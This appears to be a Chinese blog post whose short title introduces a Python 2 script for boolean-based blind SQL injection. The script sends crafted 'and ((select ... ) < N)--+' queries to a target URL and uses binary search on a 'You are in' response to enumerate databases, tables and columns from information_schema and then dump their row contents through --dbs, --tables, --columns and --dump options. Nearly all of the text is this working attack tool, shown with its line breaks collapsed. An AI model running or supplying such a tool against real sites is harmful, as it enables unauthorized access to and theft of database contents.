基于布尔注入的Python代码
基于布尔型注入,能够爆数据库,表,字段的Python代码
#!/usr/bin/env python#coding=utf-8import sysimport requestsimport reimport binasciidef http_get(url): return requests.get(url) passdef dichotomy(sql): #二分法 left = 1 right = 500 while 1: mid = (left + right)/2 if mid == left: return mid break db_count_url = sql + "%d)--+" % mid html = http_get(db_count_url).content search_flag = re.search("You are in", html) if search_flag: right = mid else: left = middef getAllDabatases(url): search_db_num =url + "' and ((select count(schema_name) from information_schema.schemata) < " #查看数据库总个数 num = dichotomy(search_db_num) # print num print ("\t" + u"Database number: %d" % num) for x in xrange(0,num): search_db_len = url + "' and ((select length(schema_name) from information_schema.schemata limit %d,1) < " % x #看某个数据库名的长度 db_len = dichotomy(search_db_len) print (u"No.%ddatabase name number: %d" % (x+1,db_len)) db_name = '' for n in xrange(1,db_len+1): search_db_name = url + "' and ((select ascii(substr((select schema_name from information_schema.schemata limit %d,1),%d,1))) < " % (x,n) #查看某个数据库名 db_name1 = chr(dichotomy(search_db_name)) # print search_db_name db_name = db_name + db_name1 print "\t" + db_namedef getAlltablesByDb(url, db_name): db_name_hex = "0x" + binascii.b2a_hex(db_name) search_tab_num = url + "' and ((select count(distinct+table_name) from information_schema.tables where table_schema=%s ) < " % db_name_hex num = dichotomy(search_tab_num) # print search_tab_num print ("\t" + u"tables number: %d" % num) for x in xrange(0,num): search_tab_len = url + "' and ((select length(table_name) from information_schema.tables where table_schema=%s limit %d,1) < " % (db_name_hex,x) #查看某个表名的长度 tab_len = dichotomy(search_tab_len) print (u"No.%d tables name number : %d" % (x+1,tab_len)) tab_name = '' for n in xrange(1,tab_len+1): search_tab_name = url + "' and ((select ascii(substr((select table_name from information_schema.tables where table_schema=%s limit %d,1),%d,1))) < " % (db_name_hex,x,n) #查看某个表名 tab_name1 = 
chr(dichotomy(search_tab_name)) # print search_db_name tab_name = tab_name + tab_name1 print "\t" + tab_namedef getAllcolumnsByTable(url, db_name, tab_name): db_name_hex = "0x" + binascii.b2a_hex(db_name) tab_name_hex = "0x" + binascii.b2a_hex(tab_name) search_column_num = url + "' and ((select count(distinct+column_name) from information_schema.columns where table_schema=%s and table_name=%s ) < " % (db_name_hex,tab_name_hex) num = dichotomy(search_column_num) print search_column_num print ("\t" + u"tables\'columns number : %d" % num) for x in xrange(0,num): search_column_len = url + "' and ((select length(column_name) from information_schema.columns where table_schema=%s and table_name=%s limit %d,1) < " % (db_name_hex,tab_name_hex,x) #查看某个字段名的长度 column_len = dichotomy(search_column_len) print (u"No.%d columns number: %d" % (x+1,column_len)) column_name = '' for n in xrange(1,column_len+1): search_column_name = url + "' and ((select ascii(substr((select column_name from information_schema.columns where table_schema=%s and table_name=%s limit %d,1),%d,1))) < " % (db_name_hex,tab_name_hex,x,n) #查看某个字段名 column_name1 = chr(dichotomy(search_column_name)) # print search_db_name column_name = column_name + column_name1 print "\t" + column_namedef getAllcontent(url, db_name, tab_name, col_name): col_name_hex = "0x" + binascii.b2a_hex(col_name) search_content_num = url + "' and ((select count(*) from %s.%s ) < " % (db_name,tab_name) num = dichotomy(search_content_num) # print search_content_num print ("\t" + u" PAX:: %d" % num) c_num =col_name.split(',') #传入的字段个数 c = len(c_num) for x in xrange(0,num): print "No.%d columns:"% (x+1) for y in xrange(0,c): search_content_len = url + "' and ((select length(%s) from %s.%s limit %d,1) < " % (c_num[y],db_name,tab_name,x) #查看某个字段对应内容的长度 content_len = dichotomy(search_content_len) print (u"\tNo.%dcolumns\'s number: %d" % (y+1,content_len)) content_name = '' for n in xrange(1,content_len+1): search_content_name = url + "' and 
((select ascii(substr((select %s from %s.%s limit %d,1),%d,1))) < " % (c_num[y],db_name,tab_name,x,n) #查看某个字段名对应内容 content_name1 = chr(dichotomy(search_content_name)) # print search_db_name content_name = content_name + content_name1 print "\t%s" % c_num[y] + ':\t' + content_namedef main(): if sys.argv[1]=='--dbs': getAllDabatases(sys.argv[2]) elif sys.argv[1]=='--tables': getAlltablesByDb(sys.argv[2],sys.argv[4]) elif sys.argv[1]=='--columns': getAllcolumnsByTable(sys.argv[2],sys.argv[4],sys.argv[6]) elif sys.argv[1]=='--dump': getAllcontent(sys.argv[2],sys.argv[4],sys.argv[6],sys.argv[8],) pass else: print '我不懂你的参数!'if __name__ == '__main__': main()